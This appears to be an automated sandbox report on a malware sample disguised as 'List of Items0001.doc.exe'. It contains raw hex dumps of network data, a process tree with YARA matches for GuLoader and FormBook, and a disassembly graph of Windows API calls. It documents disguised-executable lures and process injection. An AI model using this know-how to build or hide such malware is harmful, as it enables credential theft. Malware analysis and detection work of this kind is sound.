                                              2024-09-24 09:25:42 UTC8000INData Raw: 7a 1a 8d 33 c7 ff 17 d2 29 98 3a c1 54 80 2b 33 8b 3e 44 01 4e 0a 24 0f 44 94 b2 82 11 03 7a 45 b0 c8 42 fc 3a 24 36 bb 3c c2 d1 53 d4 3c 12 d5 b3 29 d5 42 ab 96 e2 9f 1a 50 98 d0 8d c4 f8 09 63 58 e7 83 f0 d6 72 aa 23 99 09 73 28 28 fd d1 31 ba 10 5c 34 99 87 9f b8 45 e1 29 f9 bc 24 03 9a 5d ac 0d b6 ce 9c 99 81 68 25 0b b0 8d b4 19 32 5a ac 97 4d f0 0c 78 39 88 2d b6 ac ff 87 bd a7 b7 31 5b 70 0b be 66 64 42 d5 a0 1e 1d 73 31 0d 6d 42 ec 7f f9 db 2b fa 29 2a 4d 95 48 ee 51 f5 c0 35 32 3f 2b a3 59 1b 73 bc cb 5f 5f 6f 4e 01 85 d5 a7 93 b3 42 dd e6 b6 7c e4 66 51 76 b6 6e 85 9e ab 20 d5 ae 7a de 20 64 18 c8 37 3a cd 9f bc fe 5d 08 9f 3c 7f 7d 8b d9 d4 f3 5d 40 dc 4f 5b 0a 4f 71 71 e6 ad 3d 38 bb 93 e5 c1 04 47 4e 84 0a ad 20 a2 91 36 0c 3a d1 cb 65 4d f6
                                              Data Ascii: z3):T+3>DN$DzEB:$6<S<)BPcXr#s((1\4E)$]h%2ZMx9-1[pfdBs1mB+)*MHQ52?+Ys__oNB|fQvn z d7:]<}]@O[Oqq=8GN 6:eM
                                              2024-09-24 09:25:42 UTC8000INData Raw: 56 e5 e4 4c 87 af ab f7 18 9e 1f 7c 21 ab 9a a0 89 3f c6 22 0c d8 1e cf 02 2c f0 18 2b 70 ea 4e 32 bf 34 76 71 59 ab ed ac 16 59 c0 18 88 1d bd ee c1 5b a5 7b 84 8e 75 bf c1 60 6e 0d a4 ad e4 5d fa 7b 0c 00 d7 51 0c ae e1 d6 8a b0 fd 9a 27 94 4f 37 54 17 6a 87 d7 1c 4a 5a ab 75 c9 d2 20 cb da e2 c2 6f c9 49 bd b2 a0 c0 bc fa 85 d9 e5 86 b6 fd 33 8b a3 85 96 65 84 bd 70 52 aa fe cb 9b 9f ed 4b 65 4f a7 fd 4a 47 4e ab 07 1d de d3 77 08 9b 9e 38 9a 21 46 8f af f7 be cf a7 bd ec 17 f5 e4 4e 8e fc 7d af fa 64 1a fb f3 e2 0b 62 30 bf ec ee 46 c5 b2 f7 6a ae f7 09 67 cc fa 90 fe c4 67 24 c5 d7 d2 bf 4b 94 52 0b 8c b9 fd b2 77 dd dd d7 08 10 a3 a7 13 6c 0b 0a 3d 34 0e 97 dc 6b 19 13 3c 69 d9 98 9f 87 26 1c ee 3d c0 90 8c f7 0c e5 5c 45 ab cc 93 c4 d0 40 3f 84 dc
                                              Data Ascii: VL|!?",+pN24vqYY[{u`n]{Q'O7TjJZu oI3epRKeOJGNw8!FN}db0Fjgg$KRwl=4k<i&=\E@?
                                              2024-09-24 09:25:42 UTC8000INData Raw: 9f b1 b4 64 52 3f a5 3f a5 51 2f 16 46 93 0a 59 e6 d3 8e 3f 9a 98 1b b9 f2 d1 ff 3b 02 14 6c 0e d4 b6 c7 83 3a 4c 4b ae 76 63 cf 6e 16 e1 44 c9 8d c4 a9 2d 3b 0f 5d 7c c8 e3 ab b9 88 33 d5 96 d6 f8 b2 7f db ff b4 62 a5 5c 19 58 9a 92 33 80 c5 c2 ae 42 3c ca c5 22 5f 69 96 36 8b 38 14 b8 73 f6 26 08 3f 8b e6 15 2b 96 60 57 ff 0c de 9e d5 c9 6c ad 1a 1d 4e 22 5e 32 0e 48 b9 f7 95 f2 c6 23 c7 97 76 8d a8 d9 24 3d 91 02 b6 50 d8 5c 33 60 41 02 ac b0 4c f2 89 d5 d6 29 23 2d 7d 0f fc 0a 24 5d 01 d6 e1 0a 12 1f 75 34 8d e7 b8 46 d2 fa 35 ab 11 fb 7f 35 89 f1 2b 02 74 f4 83 22 97 5b c3 5a 4b 89 72 6b 0c 0d 97 2e 7f e2 af 87 5a 40 39 97 00 8b 2d 11 3e 01 a8 77 e1 35 45 7e ac 3a a4 11 1c 63 2e 6f ea 86 e7 ef 52 eb f1 10 10 c2 a0 02 8b cf 5b 7a ae 30 af 87 5b 85 9c
                                              Data Ascii: dR??Q/FY?;l:LKvcnD-;]|3b\X3B<"_i68s&?+`WlN"^2H#v$=P\3`AL)#-}$]u4F55+t"[ZKrk.Z@9->w5E~:c.oR[z0[
                                              2024-09-24 09:25:42 UTC8000INData Raw: 90 12 bd 85 29 92 e5 7f 8c 87 0d 67 51 03 fd 57 20 ab a0 25 35 5b c2 2c 85 30 61 2a 4b 49 04 62 73 38 e5 0f 12 0f 6b d0 69 e0 7d 23 45 90 e1 a0 9b cb 5e 37 e6 df e9 c3 85 07 19 58 33 ad ea a0 ed ec e7 b2 45 e3 13 a3 93 fb c9 5f 4b b7 89 52 4d cd ed f7 1e 05 01 77 00 18 66 95 5b 61 49 ca 22 d1 53 3b d3 48 18 18 89 05 7b 50 f4 1d 6c d8 d1 7d 57 cc e2 f6 85 c5 ba 2c d6 f2 03 fe 8d 41 af 06 9b 64 a7 05 76 1c 7d df fd 6b 83 1b 7d 49 8b 78 ef 77 e5 07 aa 99 2a 25 21 3f ab 03 63 38 83 f3 98 2d 76 b5 28 d8 b1 92 4e d2 03 9c b9 ae 82 68 85 83 ee 59 99 d0 a1 32 17 6e f9 f4 83 2b 04 d4 10 d1 4b 03 dd a0 39 06 3e 83 ec 37 8f ef 10 06 2c b8 70 7f 27 50 cd 6f d1 10 a2 23 67 54 81 1c 61 9b 12 32 9a b6 92 7c 1a b4 21 94 af 52 1f c1 a5 fd 0a 48 25 b1 1b 79 4c 16 48 d1 fd
                                              Data Ascii: )gQW %5[,0a*KIbs8ki}#E^7X3E_KRMwf[aI"S;H{Pl}W,Adv}k}Ixw*%!?c8-v(NhY2n+K9>7,p'Po#gTa2|!RH%yLH
                                              2024-09-24 09:25:42 UTC8000INData Raw: 79 ff 26 77 23 cc 32 e8 78 cb 7b cc c9 53 cf b5 f3 c0 ff 36 b0 25 22 cd 65 88 6c a8 78 d4 6b fb 85 51 75 61 5b 1b d6 1e 50 c1 69 9d 7e 8c c7 05 f7 da 1d 6c 76 42 4d dd 62 51 6e e2 9a 86 b1 6e e1 4a 70 e5 70 22 d8 ea 99 ec e0 f2 5c e2 5e 2e fe 8a 46 79 ce 92 53 c6 77 e1 60 04 36 55 e8 af df d7 9b 50 be b0 b6 5f b3 a9 80 4e 08 7e fe 58 ab 43 e9 be 31 16 db 82 23 4b 0a 9e 9c 0f 08 3c 52 de bc b3 db 0e a6 2a 8d a4 ee 16 43 10 76 56 30 75 a3 45 93 14 11 3e 45 61 59 57 f3 d8 a7 9c 18 c8 b7 ed cd df 78 16 30 9b b0 66 34 c0 01 d9 92 95 28 c8 23 e5 73 cd ba d6 0b d1 b8 44 d9 32 49 2a 5c 29 f5 88 7a f7 86 72 d8 e2 b8 43 e6 d5 d9 23 c9 86 c0 1b 2d 0d 92 b3 79 42 25 69 4b 0a 7e d2 29 cb cc 00 71 d5 50 4d 01 70 01 d5 c3 5c 26 13 9a 22 4c 41 08 36 19 2f 85 ec 5e b5 2b
                                              Data Ascii: y&w#2x{S6%"elxkQua[Pi~lvBMbQnnJpp"\^.FySw`6UP_N~XC1#K<R*CvV0uE>EaYWx0f4(#sD2I*\)zrC#-yB%iK~)qPMp\&"LA6/^+
                                              2024-09-24 09:25:42 UTC8000INData Raw: 9f b1 11 6e c3 32 e1 2c 8a b7 19 68 cb d5 98 02 71 d4 7c d1 df 2c 6f 13 66 55 29 fa d1 48 be a1 53 92 52 3f 82 45 66 8b e5 5e 70 57 19 a1 d8 1a af 05 d3 1f 33 dd 82 ef c5 df 1d 86 36 b2 ca 88 1c c6 20 83 01 10 88 5a c6 1d cb eb fa 6f bc 57 98 d6 7c e6 5b 33 c8 12 15 ac 48 a2 fd fa 31 d4 be 78 fe 27 fe 88 c2 13 1b 2c 8d 27 5a 10 46 89 19 54 ab 29 f5 34 55 50 a7 fb 54 54 2b d1 e4 fe c2 58 66 b4 12 80 e5 69 d2 cb 57 0a 93 bc 69 2d 63 01 a1 43 26 ba a7 68 9a ef 59 c2 41 7e 0b e3 ec e6 78 5e 3a cb 62 75 9a 0e 93 47 68 d7 2f 76 b3 c6 66 df 99 04 f1 96 52 b7 78 31 84 14 35 3e 53 09 bf 2f ef f2 d2 66 b3 78 59 db ac 8f cd 78 f8 59 13 b9 ec 3b 3b 8e 46 39 4f 54 04 a5 c2 02 0f 1a bb e6 97 94 86 ec 52 89 22 47 a4 92 c0 c1 38 27 96 f3 c5 67 50 71 97 bd 3a f2 04 8b 26
                                              Data Ascii: n2,hq|,ofU)HSR?Ef^pW36 ZoW|[3H1x','ZFT)4UPTT+XfiWi-cC&hYA~x^:buGh/vfRx15>S/fxYxY;;F9OTR"G8'gPq:&
                                              2024-09-24 09:25:42 UTC8000INData Raw: 11 25 19 40 c7 dc b1 02 7e 31 c1 29 0e 07 a3 83 ac 64 c6 53 ac c4 2a f2 cf 76 53 88 bc cb 5d 5d c4 5b 79 c2 e9 ca b9 d4 52 c0 e8 57 f3 d1 7a aa 2b ae 90 58 02 7c ce 16 4e 06 78 c4 31 54 b3 5f a0 c2 ee b4 31 c6 97 c7 a0 03 ac 9d 6f 34 a8 ac 4d 3c 2b 7c 1e 30 30 cd 3e 37 f8 a7 a1 02 38 55 8f e0 c7 5f 73 dd 99 90 1a 7b 67 d1 f8 d9 d6 9e c5 02 f9 ec 9c 17 a4 8c 1a 7c 44 9a 72 75 56 7d 06 50 a9 e3 ff 82 0e 15 27 04 a2 45 05 c0 7f 7e c1 2b 9c c4 85 7c ea d7 36 e6 28 73 05 af cb 33 50 b4 04 2b f9 98 4d c6 db 1f fe 85 d1 7d 14 3e d8 82 aa 21 c1 2c 83 ea df 61 59 44 39 ac 6b 8a da 9b e2 2c 22 9b eb dd a4 7c 89 8d 8a 45 10 cd 7c 58 85 1a 2c 55 1a 91 93 93 be aa ec 7e ba 4b 5d f9 6a c7 0d 3e 08 90 4a 5e 62 ea 2f 40 13 9a 08 c1 d7 8e 33 39 51 7e c5 1b 5e 92 9f 93 14
                                              Data Ascii: %@~1)dS*vS]][yRWz+X|Nx1T_1o4M<+|00>78U_s{g|DruV}P'E~+|6(s3P+M}>!,aYD9k,"|E|X,U~K]j>J^b/@39Q~^


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:05:25:16
                                              Start date:24/09/2024
                                              Path:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\List of Items0001.doc.exe"
                                              Imagebase:0x400000
                                              File size:632'024 bytes
                                              MD5 hash:6D3DA95A3E1F5861A54C30DD61F80C02
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.674050583045.0000000004F78000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:05:25:33
                                              Start date:24/09/2024
                                              Path:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\List of Items0001.doc.exe"
                                              Imagebase:0x400000
                                              File size:632'024 bytes
                                              MD5 hash:6D3DA95A3E1F5861A54C30DD61F80C02
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.674206863103.0000000001768000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:05:25:51
                                              Start date:24/09/2024
                                              Path:C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe"
                                              Imagebase:0xcf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:05:25:52
                                              Start date:24/09/2024
                                              Path:C:\Windows\SysWOW64\TapiUnattend.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\TapiUnattend.exe"
                                              Imagebase:0x3e0000
                                              File size:12'800 bytes
                                              MD5 hash:D5BFFD755F566AAACB57CF83FDAA5CD0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:05:26:05
                                              Start date:24/09/2024
                                              Path:C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe"
                                              Imagebase:0xcf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:05:26:18
                                              Start date:24/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6a9e20000
                                              File size:675'744 bytes
                                              MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:05:31:32
                                              Start date:24/09/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff6166a0000
                                              File size:4'849'904 bytes
                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:19.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:15.8%
                                                Total number of Nodes:1617
                                                Total number of Limit Nodes:39
                                                execution_graph 4238 403640 SetErrorMode GetVersionExW 4239 403692 GetVersionExW 4238->4239 4240 4036ca 4238->4240 4239->4240 4241 403723 4240->4241 4242 406a35 5 API calls 4240->4242 4329 4069c5 GetSystemDirectoryW 4241->4329 4242->4241 4244 403739 lstrlenA 4244->4241 4245 403749 4244->4245 4332 406a35 GetModuleHandleA 4245->4332 4248 406a35 5 API calls 4249 403757 4248->4249 4250 406a35 5 API calls 4249->4250 4251 403763 #17 OleInitialize SHGetFileInfoW 4250->4251 4338 406668 lstrcpynW 4251->4338 4254 4037b0 GetCommandLineW 4339 406668 lstrcpynW 4254->4339 4256 4037c2 4340 405f64 4256->4340 4259 4038f7 4260 40390b GetTempPathW 4259->4260 4344 40360f 4260->4344 4262 403923 4263 403927 GetWindowsDirectoryW lstrcatW 4262->4263 4264 40397d DeleteFileW 4262->4264 4267 40360f 12 API calls 4263->4267 4354 4030d0 GetTickCount GetModuleFileNameW 4264->4354 4265 405f64 CharNextW 4266 4037f9 4265->4266 4266->4259 4266->4265 4272 4038f9 4266->4272 4269 403943 4267->4269 4269->4264 4271 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4269->4271 4270 403990 4273 403a54 4270->4273 4280 405f64 CharNextW 4270->4280 4314 403a45 4270->4314 4276 40360f 12 API calls 4271->4276 4440 406668 lstrcpynW 4272->4440 4494 403c25 4273->4494 4279 403975 4276->4279 4279->4264 4279->4273 4292 4039b2 4280->4292 4281 403b91 4284 403b99 GetCurrentProcess OpenProcessToken 4281->4284 4285 403c0f ExitProcess 4281->4285 4282 403b7c 4503 405cc8 4282->4503 4290 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 4284->4290 4291 403bdf 4284->4291 4287 403a1b 4441 40603f 4287->4441 4288 403a5c 4457 405c33 4288->4457 4290->4291 4295 406a35 5 API calls 4291->4295 4292->4287 4292->4288 4298 403be6 4295->4298 4301 403bfb ExitWindowsEx 4298->4301 4302 403c08 4298->4302 4299 403a72 lstrcatW 4300 403a7d lstrcatW lstrcmpiW 4299->4300 4300->4273 4303 403a9d 4300->4303 4301->4285 4301->4302 4507 40140b 4302->4507 4306 403aa2 4303->4306 4307 403aa9 4303->4307 4460 405b99 CreateDirectoryW 4306->4460 4465 405c16 CreateDirectoryW 4307->4465 4308 403a3a 4456 406668 lstrcpynW 4308->4456 4313 403aae SetCurrentDirectoryW 4315 403ac0 4313->4315 4316 403acb 4313->4316 4384 403d17 4314->4384 4468 406668 lstrcpynW 4315->4468 4469 406668 lstrcpynW 4316->4469 4321 403b19 CopyFileW 4326 403ad8 4321->4326 4322 403b63 4323 406428 36 API calls 4322->4323 4323->4273 4325 4066a5 17 API calls 4325->4326 4326->4322 4326->4325 4328 403b4d CloseHandle 4326->4328 4470 4066a5 4326->4470 4487 406428 MoveFileExW 4326->4487 4491 405c4b CreateProcessW 4326->4491 4328->4326 4330 4069e7 wsprintfW LoadLibraryExW 4329->4330 4330->4244 4333 406a51 4332->4333 4334 406a5b GetProcAddress 4332->4334 4335 4069c5 3 API calls 4333->4335 4336 403750 4334->4336 4337 406a57 4335->4337 4336->4248 4337->4334 4337->4336 4338->4254 4339->4256 4341 405f6a 4340->4341 4342 4037e8 CharNextW 4341->4342 4343 405f71 CharNextW 4341->4343 4342->4266 4343->4341 4510 4068ef 4344->4510 4346 40361b 4347 403625 4346->4347 4519 405f37 lstrlenW CharPrevW 4346->4519 4347->4262 4350 405c16 2 API calls 4351 403633 4350->4351 4522 406187 4351->4522 4526 406158 GetFileAttributesW CreateFileW 4354->4526 4356 403113 4357 403120 4356->4357 4527 406668 lstrcpynW 4356->4527 4357->4270 4359 403136 4528 405f83 lstrlenW 4359->4528 4363 403147 GetFileSize 4364 403241 4363->4364 4375 40315e 4363->4375 4533 40302e 4364->4533 4368 403286 GlobalAlloc 4370 40329d 4368->4370 4369 4032de 4373 40302e 32 API calls 4369->4373 4376 406187 2 API calls 4370->4376 4372 403267 4374 4035e2 ReadFile 4372->4374 4373->4357 4377 403272 4374->4377 4375->4357 4375->4364 4375->4369 4378 40302e 32 API calls 4375->4378 4564 4035e2 4375->4564 4379 4032ae CreateFileW 4376->4379 4377->4357 4377->4368 4378->4375 4379->4357 4380 4032e8 4379->4380 4548 4035f8 SetFilePointer 4380->4548 4382 4032f6 4549 403371 4382->4549 4385 406a35 5 API calls 4384->4385 4386 403d2b 4385->4386 4387 403d31 4386->4387 4388 403d43 4386->4388 4626 4065af wsprintfW 4387->4626 4627 406536 4388->4627 4391 403d92 lstrcatW 4393 403d41 4391->4393 4611 403fed 4393->4611 4394 406536 3 API calls 4394->4391 4397 40603f 18 API calls 4398 403dc4 4397->4398 4399 403e58 4398->4399 4402 406536 3 API calls 4398->4402 4400 40603f 18 API calls 4399->4400 4401 403e5e 4400->4401 4403 403e6e LoadImageW 4401->4403 4405 4066a5 17 API calls 4401->4405 4404 403df6 4402->4404 4406 403f14 4403->4406 4407 403e95 RegisterClassW 4403->4407 4404->4399 4408 403e17 lstrlenW 4404->4408 4411 405f64 CharNextW 4404->4411 4405->4403 4410 40140b 2 API calls 4406->4410 4409 403ecb SystemParametersInfoW CreateWindowExW 4407->4409 4439 403f1e 4407->4439 4412 403e25 lstrcmpiW 4408->4412 4413 403e4b 4408->4413 4409->4406 4414 403f1a 4410->4414 4415 403e14 4411->4415 4412->4413 4416 403e35 GetFileAttributesW 4412->4416 4417 405f37 3 API calls 4413->4417 4419 403fed 18 API calls 4414->4419 4414->4439 4415->4408 4418 403e41 4416->4418 4420 403e51 4417->4420 4418->4413 4421 405f83 2 API calls 4418->4421 4422 403f2b 4419->4422 4632 406668 lstrcpynW 4420->4632 4421->4413 4424 403f37 ShowWindow 4422->4424 4425 403fba 4422->4425 4427 4069c5 3 API calls 4424->4427 4619 40579d OleInitialize 4425->4619 4429 403f4f 4427->4429 4428 403fc0 4431 403fc4 4428->4431 4432 403fdc 4428->4432 4430 403f5d GetClassInfoW 4429->4430 4433 4069c5 3 API calls 4429->4433 4435 403f71 GetClassInfoW RegisterClassW 4430->4435 4436 403f87 DialogBoxParamW 4430->4436 4438 40140b 2 API calls 4431->4438 4431->4439 4434 40140b 2 API calls 4432->4434 4433->4430 4434->4439 4435->4436 4437 40140b 2 API calls 4436->4437 4437->4439 4438->4439 4439->4273 4440->4260 4648 406668 lstrcpynW 4441->4648 4443 406050 4649 405fe2 CharNextW CharNextW 4443->4649 4446 403a27 4446->4273 4455 406668 lstrcpynW 4446->4455 4447 4068ef 5 API calls 4453 406066 4447->4453 4448 406097 lstrlenW 4449 4060a2 4448->4449 4448->4453 4451 405f37 3 API calls 4449->4451 4452 4060a7 GetFileAttributesW 4451->4452 4452->4446 4453->4446 4453->4448 4454 405f83 2 API calls 4453->4454 4655 40699e FindFirstFileW 4453->4655 4454->4448 4455->4308 4456->4314 4458 406a35 5 API calls 4457->4458 4459 403a61 lstrcatW 4458->4459 4459->4299 4459->4300 4461 403aa7 4460->4461 4462 405bea GetLastError 4460->4462 4461->4313 4462->4461 4463 405bf9 SetFileSecurityW 4462->4463 4463->4461 4464 405c0f GetLastError 4463->4464 4464->4461 4466 405c26 4465->4466 4467 405c2a GetLastError 4465->4467 4466->4313 4467->4466 4468->4316 4469->4326 4485 4066b2 4470->4485 4471 4068d5 4472 403b0d DeleteFileW 4471->4472 4660 406668 lstrcpynW 4471->4660 4472->4321 4472->4326 4474 4068a3 lstrlenW 4474->4485 4475 406536 3 API calls 4475->4485 4476 4066a5 10 API calls 4476->4474 4477 4067ba GetSystemDirectoryW 4477->4485 4480 4067cd GetWindowsDirectoryW 4480->4485 4481 4066a5 10 API calls 4481->4485 4482 406844 lstrcatW 4482->4485 4483 4068ef 5 API calls 4483->4485 4484 4067fc SHGetSpecialFolderLocation 4484->4485 4486 406814 SHGetPathFromIDListW CoTaskMemFree 4484->4486 4485->4471 4485->4474 4485->4475 4485->4476 4485->4477 4485->4480 4485->4481 4485->4482 4485->4483 4485->4484 4658 4065af wsprintfW 4485->4658 4659 406668 lstrcpynW 4485->4659 4486->4485 4488 406449 4487->4488 4489 40643c 4487->4489 4488->4326 4661 4062ae 4489->4661 4492 405c8a 4491->4492 4493 405c7e CloseHandle 4491->4493 4492->4326 4493->4492 4495 403c40 4494->4495 4496 403c36 CloseHandle 4494->4496 4497 403c54 4495->4497 4498 403c4a CloseHandle 4495->4498 4496->4495 4695 403c82 4497->4695 4498->4497 4504 405cdd 4503->4504 4505 403b89 ExitProcess 4504->4505 4506 405cf1 MessageBoxIndirectW 4504->4506 4506->4505 4508 401389 2 API calls 4507->4508 4509 401420 4508->4509 4509->4285 4516 4068fc 4510->4516 4511 406977 CharPrevW 4513 406972 4511->4513 4512 406965 CharNextW 4512->4513 4512->4516 4513->4511 4514 406998 4513->4514 4514->4346 4515 405f64 CharNextW 4515->4516 4516->4512 4516->4513 4516->4515 4517 406951 CharNextW 4516->4517 4518 406960 CharNextW 4516->4518 4517->4516 4518->4512 4520 405f53 lstrcatW 4519->4520 4521 40362d 4519->4521 4520->4521 4521->4350 4523 406194 GetTickCount GetTempFileNameW 4522->4523 4524 40363e 4523->4524 4525 4061ca 4523->4525 4524->4262 4525->4523 4525->4524 4526->4356 4527->4359 4529 405f91 4528->4529 4530 40313c 4529->4530 4531 405f97 CharPrevW 4529->4531 4532 406668 lstrcpynW 4530->4532 4531->4529 4531->4530 4532->4363 4534 403057 4533->4534 4535 40303f 4533->4535 4537 403067 GetTickCount 4534->4537 4538 40305f 4534->4538 4536 403048 DestroyWindow 4535->4536 4539 40304f 4535->4539 4536->4539 4537->4539 4541 403075 4537->4541 4568 406a71 4538->4568 4539->4357 4539->4368 4567 4035f8 SetFilePointer 4539->4567 4542 4030aa CreateDialogParamW ShowWindow 4541->4542 4543 40307d 4541->4543 4542->4539 4543->4539 4572 403012 4543->4572 4545 40308b wsprintfW 4575 4056ca 4545->4575 4548->4382 4550 403380 SetFilePointer 4549->4550 4551 40339c 4549->4551 4550->4551 4586 403479 GetTickCount 4551->4586 4554 403439 4554->4357 4557 403479 42 API calls 4558 4033d3 4557->4558 4558->4554 4559 40343f ReadFile 4558->4559 4561 4033e2 4558->4561 4559->4554 4561->4554 4562 4061db ReadFile 4561->4562 4601 40620a WriteFile 4561->4601 4562->4561 4565 4061db ReadFile 4564->4565 4566 4035f5 4565->4566 4566->4375 4567->4372 4569 406a8e PeekMessageW 4568->4569 4570 406a84 DispatchMessageW 4569->4570 4571 406a9e 4569->4571 4570->4569 4571->4539 4573 403021 4572->4573 4574 403023 MulDiv 4572->4574 4573->4574 4574->4545 4576 4056e5 4575->4576 4585 4030a8 4575->4585 4577 405701 lstrlenW 4576->4577 4578 4066a5 17 API calls 4576->4578 4579 40572a 4577->4579 4580 40570f lstrlenW 4577->4580 4578->4577 4582 405730 SetWindowTextW 4579->4582 4583 40573d 4579->4583 4581 405721 lstrcatW 4580->4581 4580->4585 4581->4579 4582->4583 4584 405743 SendMessageW SendMessageW SendMessageW 4583->4584 4583->4585 4584->4585 4585->4539 4587 4035d1 4586->4587 4588 4034a7 4586->4588 4590 40302e 32 API calls 4587->4590 4603 4035f8 SetFilePointer 4588->4603 4591 4033a3 4590->4591 4591->4554 4599 4061db ReadFile 4591->4599 4592 4034b2 SetFilePointer 4594 4034d7 4592->4594 4593 4035e2 ReadFile 4593->4594 4594->4591 4594->4593 4596 40302e 32 API calls 4594->4596 4597 40620a WriteFile 4594->4597 4598 4035b2 SetFilePointer 4594->4598 4604 406bb0 4594->4604 4596->4594 4597->4594 4598->4587 4600 4033bc 4599->4600 4600->4554 4600->4557 4602 406228 4601->4602 4602->4561 4603->4592 4605 406bd5 4604->4605 4606 406bdd 4604->4606 4605->4594 4606->4605 4607 406c64 GlobalFree 4606->4607 4608 406c6d GlobalAlloc 4606->4608 4609 406ce4 GlobalAlloc 4606->4609 4610 406cdb GlobalFree 4606->4610 4607->4608 4608->4605 4608->4606 4609->4605 4609->4606 4610->4609 4612 404001 4611->4612 4633 4065af wsprintfW 4612->4633 4614 404072 4634 4040a6 4614->4634 4616 403da2 4616->4397 4617 404077 4617->4616 4618 4066a5 17 API calls 4617->4618 4618->4617 4637 404610 4619->4637 4621 4057e7 4622 404610 